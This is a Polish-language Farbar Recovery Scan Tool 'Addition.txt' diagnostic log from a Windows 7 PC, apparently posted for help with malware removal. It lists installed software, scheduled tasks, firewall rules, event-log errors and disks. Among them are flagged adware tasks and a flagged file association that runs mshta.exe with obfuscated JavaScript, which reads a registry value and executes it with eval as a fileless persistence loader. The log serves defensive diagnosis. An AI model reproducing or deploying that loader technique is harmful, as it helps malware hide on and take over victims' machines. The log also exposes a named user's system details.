Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x86) Wersja: 20-11-2016 Uruchomiony przez Kamil Kozak (20-11-2016 19:15:13) Uruchomiony z C:\Users\Kamil Kozak\Desktop\CZYSZCZENIE Microsoft Windows 7 Professional Service Pack 1 (X86) (2011-04-04 05:42:37) Tryb startu: Normal ========================================================== ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-1250789083-1527708771-4203453902-500 - Administrator - Disabled) Gość (S-1-5-21-1250789083-1527708771-4203453902-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-1250789083-1527708771-4203453902-1004 - Limited - Enabled) Kamil Kozak (S-1-5-21-1250789083-1527708771-4203453902-1002 - Administrator - Enabled) => C:\Users\Kamil Kozak ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AV: ESET Smart Security 4.2 (Enabled - Up to date) {77DEAFED-8149-104B-25A1-21771CA47CD1} AV: Microsoft Security Essentials (Disabled - Up to date) {71A27EC9-3DA6-45FC-60A7-004F623C6189} AS: ESET Smart Security 4.2 (Enabled - Up to date) {CCBF4E09-A773-1FC5-1F11-1A056723366C} AS: Microsoft Security Essentials (Disabled - Up to date) {CAC39F2D-1B9C-4A72-5A17-3B3D19BB2B34} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} FW: Zapora osobista (Enabled) {4FE52EC8-CB26-1113-0EFE-8842E2773BAA} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) µTorrent (HKU\S-1-5-21-1250789083-1527708771-4203453902-1002\...\uTorrent) (Version: 3.4.3.40760 - BitTorrent Inc.) Adobe Flash Player 22 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 22.0.0.210 - Adobe Systems Incorporated) CCleaner (HKLM\...\CCleaner) (Version: 5.16 - Piriform) Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation) Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.10.205.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710F4C1C-CC18-4C49-8CBF-51240C89A1A2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837B34E3-7C30-493C-8F6A-2B0F04E2912C}) (Version: 8.0.59193 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 (HKLM\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Mozilla Firefox 50.0 (x86 pl) (HKLM\...\Mozilla Firefox 50.0 (x86 pl)) (Version: 50.0 - Mozilla) Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 50.0.0.6152 - Mozilla) Nokia Software Updater (HKLM\...\{7130468A-F53F-4698-8C09-A339EA3B05E6}) (Version: 3.0.655 - Nokia Corporation) ==================== Niestandardowe rejestracje CLSID (filtrowane): ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) CustomCLSID: HKU\S-1-5-21-1250789083-1527708771-4203453902-1002_Classes\CLSID\{010833F3-751A-402F-9FCC-C365B6A12E41}\localserver32 -> C:\Users\Kamil Kozak\Desktop\gry, instalki, programy\BESTplayer.exe (Karol Winnicki) CustomCLSID: HKU\S-1-5-21-1250789083-1527708771-4203453902-1002_Classes\CLSID\{1FD1FE74-9E3C-4C1C-AEEB-AAB592AD770F}\localserver32 -> C:\Users\Kamil Kozak\AppData\Local\Facebook\Update\FacebookUpdate.exe (Facebook Inc.) CustomCLSID: HKU\S-1-5-21-1250789083-1527708771-4203453902-1002_Classes\CLSID\{5E71E4F3-E8C7-4906-9626-973E418762B6}\InprocServer32 -> C:\Users\Kamil Kozak\AppData\Local\Facebook\Update\1.2.205.0\goopdate.dll (Facebook Inc.) CustomCLSID: HKU\S-1-5-21-1250789083-1527708771-4203453902-1002_Classes\CLSID\{693566bc-21f8-401e-8d42-e2c5ce50dacc}\localserver32 -> C:\Users\KAMILK~1\AppData\Local\Temp\{d5641912-e47a-429c-879e-cfe13eac7a13}\IDriver.NonElevated.exe (dane wartości zawierają 13 znaków więcej). CustomCLSID: HKU\S-1-5-21-1250789083-1527708771-4203453902-1002_Classes\CLSID\{8B9F5BF4-0407-4BB2-9FED-4C0372DABD00}\localserver32 -> C:\Users\Kamil Kozak\AppData\Local\Facebook\Video\Skype\FacebookVideoCallingProxy.exe (Skype Limited) CustomCLSID: HKU\S-1-5-21-1250789083-1527708771-4203453902-1002_Classes\CLSID\{B6CE1A28-A831-43E4-A81F-E2B429D66231}\InprocServer32 -> C:\Users\Kamil Kozak\AppData\Local\AskToolbar\Downloaded Program Files\Nero.dll (Ask.com) CustomCLSID: HKU\S-1-5-21-1250789083-1527708771-4203453902-1002_Classes\CLSID\{CBE9C57E-FFA9-4123-8354-AD360D6DD3CC}\InprocServer32 -> C:\Users\Kamil Kozak\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll (Skype Limited) ==================== Zaplanowane zadania (filtrowane) ============= (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {18AEC372-6A65-4598-8867-2BA4BB00B1CD} - System32\Tasks\Hewlett-Packard\HP Assistant\PC Health Analysis => C:\Program Files\Hewlett-Packard\HP Support Framework\HPSF.exe [2010-03-24] (Hewlett-Packard) Task: {1D3FA21B-C33A-43CB-A538-92FFB0012F10} - System32\Tasks\Adobe Flash Player Updater => C:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2016-11-06] (Adobe Systems Incorporated) Task: {2714CC34-FB09-463D-8255-1123EA8A9C24} - System32\Tasks\Registration => C:\Program Files\Hewlett-Packard\HP Setup\RemEngine.exe [2010-04-22] () Task: {72BB7F0C-D09A-45DB-9259-B77C48CDB7C9} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1250789083-1527708771-4203453902-1002Core => C:\Users\Kamil Kozak\AppData\Local\Facebook\Update\FacebookUpdate.exe [2014-06-22] (Facebook Inc.) Task: {74B1B1BC-897B-4EF0-97AB-9154F970CA49} - System32\Tasks\Hewlett-Packard\HP Assistant\PC Tuneup => C:\Program Files\Hewlett-Packard\HP Support Framework\HPSF.exe [2010-03-24] (Hewlett-Packard) Task: {9190A08C-556C-4638-AC1C-EC4589DFD7B0} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-03-11] (Piriform Ltd) Task: {AE840F8E-AE60-4936-A598-B6601E125DCA} - System32\Tasks\Microsoft\Microsoft Antimalware\MpIdleTask => c:\Program Files\Microsoft Security Client\\MpCmdRun.exe [2016-08-30] (Microsoft Corporation) Task: {CEF03235-A70B-4096-AB34-35962ED3BE50} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1250789083-1527708771-4203453902-1002UA => C:\Users\Kamil Kozak\AppData\Local\Facebook\Update\FacebookUpdate.exe [2014-06-22] (Facebook Inc.) (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) Task: C:\windows\Tasks\Adobe Flash Player Updater.job => C:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\windows\Tasks\APSnotifierPP1.job => C:\Program Files\AnyProtectEx\AnyProtect.exe <==== UWAGA Task: C:\windows\Tasks\APSnotifierPP2.job => C:\Program Files\AnyProtectEx\AnyProtect.exe <==== UWAGA Task: C:\windows\Tasks\APSnotifierPP3.job => C:\Program Files\AnyProtectEx\AnyProtect.exe <==== UWAGA Task: C:\windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1250789083-1527708771-4203453902-1002Core.job => C:\Users\Kamil Kozak\AppData\Local\Facebook\Update\FacebookUpdate.exe Task: C:\windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1250789083-1527708771-4203453902-1002UA.job => C:\Users\Kamil Kozak\AppData\Local\Facebook\Update\FacebookUpdate.exe ==================== Skróty ============================= (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) ==================== Załadowane moduły (filtrowane) ============== 2010-04-05 19:15 - 2010-04-05 19:15 - 00052280 _____ () C:\Program Files\Hewlett-Packard\HP Power Assistant\HardwareAccess.dll 2010-04-05 19:15 - 2010-04-05 19:15 - 00267832 _____ () C:\Program Files\Hewlett-Packard\HP Power Assistant\HPCommon.XmlSerializers.dll 2010-04-05 19:15 - 2010-04-05 19:15 - 00055352 _____ () C:\Program Files\Hewlett-Packard\HP Power Assistant\Graphs.dll 2010-02-22 19:19 - 2010-02-22 19:19 - 02121728 _____ () C:\Program Files\Common Files\LightScribe\QtCore4.dll 2010-02-22 19:19 - 2010-02-22 19:19 - 07745536 _____ () C:\Program Files\Common Files\LightScribe\QtGui4.dll 2010-02-22 19:19 - 2010-02-22 19:19 - 00135168 _____ () C:\Program Files\Common Files\LightScribe\plugins\imageformats\qjpeg4.dll 2016-03-11 21:31 - 2016-03-11 21:31 - 00061440 _____ () C:\Program Files\CCleaner\lang\lang-1045.dll 2012-06-26 12:11 - 2012-06-26 12:11 - 02302040 _____ () C:\Program Files\Nokia\Nokia PC Suite 7\QtCore4.dll 2012-06-26 12:11 - 2012-06-26 12:11 - 08197208 _____ () C:\Program Files\Nokia\Nokia PC Suite 7\QtGui4.dll 2012-06-26 12:11 - 2012-06-26 12:11 - 00345688 _____ () C:\Program Files\Nokia\Nokia PC Suite 7\QtXml4.dll 2012-06-26 12:10 - 2012-06-26 12:10 - 00202328 _____ () C:\Program Files\Nokia\Nokia PC Suite 7\imageformats\qjpeg4.dll 2012-06-26 12:10 - 2012-06-26 12:10 - 00027736 _____ () C:\Program Files\Nokia\Nokia PC Suite 7\imageformats\qsvg4.dll 2012-06-26 12:11 - 2012-06-26 12:11 - 00282200 _____ () C:\Program Files\Nokia\Nokia PC Suite 7\QtSvg4.dll 2009-12-29 22:31 - 2009-12-29 22:31 - 00132384 _____ () C:\Program Files\WIDCOMM\Bluetooth Software\btkeyind.dll 2010-04-05 19:11 - 2010-04-05 19:11 - 00030264 _____ () C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_LogicLayer.dll 2010-04-05 19:12 - 2010-04-05 19:12 - 00052280 _____ () C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HardwareAccess.dll 2010-04-05 19:12 - 2010-04-05 19:12 - 00267832 _____ () C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPCommon.XmlSerializers.dll ==================== Alternate Data Streams (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) ==================== Tryb awaryjny (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) ==================== Powiązania plików (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) HKU\S-1-5-21-1250789083-1527708771-4203453902-1002\Software\Classes\4a09: "C:\windows\system32\mshta.exe" "javascript:Ct3i7Ga="fJdS";wn09=new ActiveXObject("WScript.Shell");hyMxp4WA="FJ";S4Qld1=wn09.RegRead("HKCU\\software\\gxveifoagx\\yvszgh");dBB6Qn="xHV";eval(S4Qld1);iozB5JE="mbtVPiH";" <===== UWAGA ==================== Internet Explorer - Witryny zaufane i z ograniczeniami =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) ==================== Hosts - zawartość: =============================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2009-07-14 03:04 - 2016-11-14 18:39 - 00000035 ____A C:\windows\system32\Drivers\etc\hosts ==================== Inne obszary ============================ (Obecnie brak automatycznej naprawy dla tej sekcji.) HKU\S-1-5-21-1250789083-1527708771-4203453902-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\Kamil Kozak\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 192.168.100.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Zapora systemu Windows [funkcja wyłączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == MSCONFIG\startupreg: Facebook Update => "C:\Users\Kamil Kozak\AppData\Local\Facebook\Update\FacebookUpdate.exe" /c /nocrashserver MSCONFIG\startupreg: PC Suite Tray => "C:\Program Files\Nokia\Nokia PC Suite 7\PCSuite.exe" -onlytray MSCONFIG\startupreg: Skype => "C:\Program Files\Skype\Phone\Skype.exe" /minimized /regrun MSCONFIG\startupreg: Start WingMan Profiler => C:\Program Files\Logitech\Gaming Software\LWEMon.exe /noui ==================== Reguły Zapory systemu Windows (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe FirewallRules: [VirtualPC-In-UDP-1] => (Allow) %SystemRoot%\System32\vpc.exe FirewallRules: [VirtualPC-In-UDP-2] => (Allow) %SystemRoot%\System32\vpc.exe FirewallRules: [VirtualPC-In-TCP-1] => (Allow) %SystemRoot%\System32\vpc.exe FirewallRules: [{8A980217-7891-48F1-8863-CFC82BD7463E}] => (Allow) C:\Program Files\Skype\Phone\Skype.exe FirewallRules: [{52F453DA-CD94-41F7-9847-77E1524E0EAE}] => (Allow) C:\Windows\System32\spool\drivers\w32x86\3\HP1006MC.EXE FirewallRules: [{C5F0D925-4284-4E1C-B719-45B2DC86F0CE}] => (Allow) C:\Windows\System32\spool\drivers\w32x86\3\HP1006MC.EXE FirewallRules: [{20E9DD5D-00D9-4AA0-80B4-189134979CE7}] => (Allow) C:\Windows\System32\msiexec.exe FirewallRules: [{1824C5DF-5840-426D-8E42-15E70AD8547D}] => (Allow) C:\Windows\System32\msiexec.exe FirewallRules: [{43195E2C-00FD-4667-841F-749ADEC4B7BF}] => (Allow) C:\Users\Kamil Kozak\AppData\Local\Facebook\Video\Skype\FacebookVideoCalling.exe FirewallRules: [{9A920761-A97E-4C45-8C69-049E857152B9}] => (Allow) C:\Program Files\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe FirewallRules: [{F1F3DF24-A700-4EC4-A2F0-2EF95AC223FD}] => (Allow) C:\Users\Kamil Kozak\AppData\Roaming\ACEStream\engine\ace_engine.exe FirewallRules: [{26928365-2C77-4466-9B20-90D9B546F867}] => (Allow) C:\Users\Kamil Kozak\AppData\Roaming\ACEStream\engine\ace_engine.exe FirewallRules: [{94421EAC-F45F-4D16-A089-C867B0015A2E}] => (Allow) C:\windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe FirewallRules: [{7547DB6B-5C1E-4753-8DE4-4963EC7E5499}] => (Allow) C:\Users\Kamil Kozak\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{074A2ABC-49BD-4FFB-AEFD-9D0F4F7AD653}] => (Allow) C:\Users\Kamil Kozak\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{0BC118A5-998A-42C5-B1EC-75584AEB47E6}] => (Allow) C:\windows\explorer.exe FirewallRules: [{B0E47B5D-0FE3-4961-A5F0-5373DC63336C}] => (Allow) C:\windows\system32\rundll32.exe FirewallRules: [{C2F2F69F-E2A7-4F51-B592-9ED1EE47D23A}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe FirewallRules: [{4E0A8A9D-8D91-4000-A18D-08591CA70984}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe ==================== Punkty Przywracania systemu ========================= 12-11-2016 01:32:50 Windows Update 13-11-2016 00:03:27 Windows Update 14-11-2016 00:14:47 Windows Update 14-11-2016 17:06:17 Windows Update 14-11-2016 19:32:55 Windows Update 14-11-2016 22:21:41 Windows Update 15-11-2016 00:14:59 Windows Update 16-11-2016 00:53:54 Windows Update 17-11-2016 00:48:20 Windows Update 18-11-2016 12:21:33 Windows Update 18-11-2016 23:18:02 Windows Update 19-11-2016 23:23:24 Windows Update ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= ==================== Błędy w Dzienniku zdarzeń: ========================= Dziennik Aplikacja: ================== Error: (11/16/2016 11:38:09 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: plugin-container.exe, wersja: 49.0.2.6136, sygnatura czasowa: 0x5807c043 Nazwa modułu powodującego błąd: mozglue.dll, wersja: 49.0.2.6136, sygnatura czasowa: 0x5807b9a7 Kod wyjątku: 0x80000003 Przesunięcie błędu: 0x0000e83e Identyfikator procesu powodującego błąd: 0x1070 Godzina uruchomienia aplikacji powodującej błąd: 0x01d240533fb6bfa6 Ścieżka aplikacji powodującej błąd: C:\Program Files\Mozilla Firefox\plugin-container.exe Ścieżka modułu powodującego błąd: C:\Program Files\Mozilla Firefox\mozglue.dll Identyfikator raportu: 58aa4c89-ac4d-11e6-bd52-643150868987 Error: (11/15/2016 11:16:00 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: plugin-container.exe, wersja: 49.0.2.6136, sygnatura czasowa: 0x5807c043 Nazwa modułu powodującego błąd: mozglue.dll, wersja: 49.0.2.6136, sygnatura czasowa: 0x5807b9a7 Kod wyjątku: 0x80000003 Przesunięcie błędu: 0x0000e83e Identyfikator procesu powodującego błąd: 0x14cc Godzina uruchomienia aplikacji powodującej błąd: 0x01d23f293247469f Ścieżka aplikacji powodującej błąd: C:\Program Files\Mozilla Firefox\plugin-container.exe Ścieżka modułu powodującego błąd: C:\Program Files\Mozilla Firefox\mozglue.dll Identyfikator raportu: 80f375f5-ab1c-11e6-86f6-643150868987 Error: (11/14/2016 11:33:07 AM) (Source: Google Update) (EventID: 20) (User: Kamil) Description: Event-ID 20 Error: (11/12/2016 08:55:57 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: plugin-container.exe, wersja: 49.0.2.6136, sygnatura czasowa: 0x5807c043 Nazwa modułu powodującego błąd: mozglue.dll, wersja: 49.0.2.6136, sygnatura czasowa: 0x5807b9a7 Kod wyjątku: 0x80000003 Przesunięcie błędu: 0x0000e83e Identyfikator procesu powodującego błąd: 0x1be0 Godzina uruchomienia aplikacji powodującej błąd: 0x01d23d0eec442e8c Ścieżka aplikacji powodującej błąd: C:\Program Files\Mozilla Firefox\plugin-container.exe Ścieżka modułu powodującego błąd: C:\Program Files\Mozilla Firefox\mozglue.dll Identyfikator raportu: 0653d2a0-a912-11e6-8afb-643150868987 Error: (11/12/2016 08:55:40 PM) (Source: Microsoft-Windows-RestartManager) (EventID: 10006) (User: Kamil) Description: Nie można zamknąć aplikacji lub usługi Firefox. Error: (11/09/2016 08:59:01 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: ZARZĄDZANIE NT) Description: Nie można usunąć z pamięci ciągów licznika wydajności dla usługi WmiApRpl (WmiApRpl). Pierwszy wpis DWORD w sekcji danych (Data) zawiera kod błędu. Error: (11/09/2016 08:59:01 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: ZARZĄDZANIE NT) Description: Ciągi wydajności w wartości rejestru wydajności są uszkodzone, kiedy proces wykonuje następującą operację na dostawcy licznika rozszerzeń: Performance. Wartość BaseIndex z rejestru wydajności to pierwszy wpis DWORD w sekcji danych Data, wartość LastCounter to drugi wpis DWORD, a wartość LastHelp to trzeci wpis DWORD w sekcji Data. Error: (11/09/2016 08:59:00 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: ZARZĄDZANIE NT) Description: Ciągi wydajności w wartości rejestru wydajności są uszkodzone, kiedy proces wykonuje następującą operację na dostawcy licznika rozszerzeń: Performance. Wartość BaseIndex z rejestru wydajności to pierwszy wpis DWORD w sekcji danych Data, wartość LastCounter to drugi wpis DWORD, a wartość LastHelp to trzeci wpis DWORD w sekcji Data. Error: (11/08/2016 09:14:39 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: iexplore.exe, wersja: 11.0.9600.18500, sygnatura czasowa: 0x57edec53 Nazwa modułu powodującego błąd: MSHTML.dll, wersja: 11.0.9600.18500, sygnatura czasowa: 0x57edfc0f Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x00a75221 Identyfikator procesu powodującego błąd: 0x2d1c Godzina uruchomienia aplikacji powodującej błąd: 0x01d239fb85421266 Ścieżka aplikacji powodującej błąd: C:\Program Files\Internet Explorer\iexplore.exe Ścieżka modułu powodującego błąd: C:\windows\system32\MSHTML.dll Identyfikator raportu: f8eb0566-a5ef-11e6-86e1-643150868987 Error: (11/08/2016 08:33:10 PM) (Source: Google Update) (EventID: 20) (User: Kamil) Description: Event-ID 20 Dziennik System: ============= Error: (11/20/2016 05:33:08 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi hpqwmiex z powodu następującego błędu: Usługa nie odpowiada na sygnał uruchomienia lub sygnał sterujący w oczekiwanym czasie. Error: (11/20/2016 05:33:08 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na połączenie się z usługą hpqwmiex. Error: (11/20/2016 05:33:08 PM) (Source: DCOM) (EventID: 10005) (User: ) Description: Model DCOM odebrał błąd 1053 podczas próby uruchomienia usługi hpqwmiex z argumentami w celu uruchomienia serwera: {F5539356-2F02-40D4-999E-FA61F45FE12E} Error: (11/20/2016 05:30:56 PM) (Source: EventLog) (EventID: 6008) (User: ) Description: Poprzednie zamknięcie systemu przy 12:20:37 na ‎2016-‎11-‎20 było nieoczekiwane. Error: (11/19/2016 11:24:31 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: ZARZĄDZANIE NT) Description: Instalacja nie powiodła się: system Windows nie mógł zainstalować następującej aktualizacji, ponieważ wystąpił błąd 0x80070643: Aktualizacja zabezpieczeń pakietu redystrybucyjnego programu Microsoft Visual C++ 2008 z dodatkiem Service Pack 1 (KB2538243). Error: (11/19/2016 02:39:40 PM) (Source: EventLog) (EventID: 6008) (User: ) Description: Poprzednie zamknięcie systemu przy 13:47:28 na ‎2016-‎11-‎19 było nieoczekiwane. Error: (11/18/2016 11:18:50 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: ZARZĄDZANIE NT) Description: Instalacja nie powiodła się: system Windows nie mógł zainstalować następującej aktualizacji, ponieważ wystąpił błąd 0x80070643: Aktualizacja zabezpieczeń pakietu redystrybucyjnego programu Microsoft Visual C++ 2008 z dodatkiem Service Pack 1 (KB2538243). Error: (11/18/2016 03:39:18 PM) (Source: Service Control Manager) (EventID: 7011) (User: ) Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na odpowiedź transakcji z usługi lmhosts. Error: (11/18/2016 01:55:15 PM) (Source: EventLog) (EventID: 6008) (User: ) Description: Poprzednie zamknięcie systemu przy 12:46:15 na ‎2016-‎11-‎18 było nieoczekiwane. Error: (11/18/2016 12:26:52 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: ZARZĄDZANIE NT) Description: Instalacja nie powiodła się: system Windows nie mógł zainstalować następującej aktualizacji, ponieważ wystąpił błąd 0x80070643: Aktualizacja zabezpieczeń pakietu redystrybucyjnego programu Microsoft Visual C++ 2008 z dodatkiem Service Pack 1 (KB2538243). ==================== Statystyki pamięci =========================== Procesor: Intel(R) Core(TM) i5 CPU M 450 @ 2.40GHz Procent pamięci w użyciu: 58% Całkowita pamięć fizyczna: 1903.43 MB Dostępna pamięć fizyczna: 791.42 MB Całkowita pamięć wirtualna: 3806.86 MB Dostępna pamięć wirtualna: 1987.89 MB ==================== Dyski ================================ Drive c: () (Fixed) (Total:280.79 GB) (Free:196.5 GB) NTFS ==>[system z komponentami startowymi (pozyskano odczytując dysk)] Drive f: (HP_TOOLS) (Fixed) (Total:1.99 GB) (Free:0.26 GB) FAT32 ==================== MBR & Tablica partycji ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: 378C2B7F) Partition 1: (Active) - (Size=300 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=280.8 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=15 GB) - (Type=07 NTFS) Partition 4: (Not Active) - (Size=2 GB) - (Type=0C) ==================== Koniec Addition.txt ============================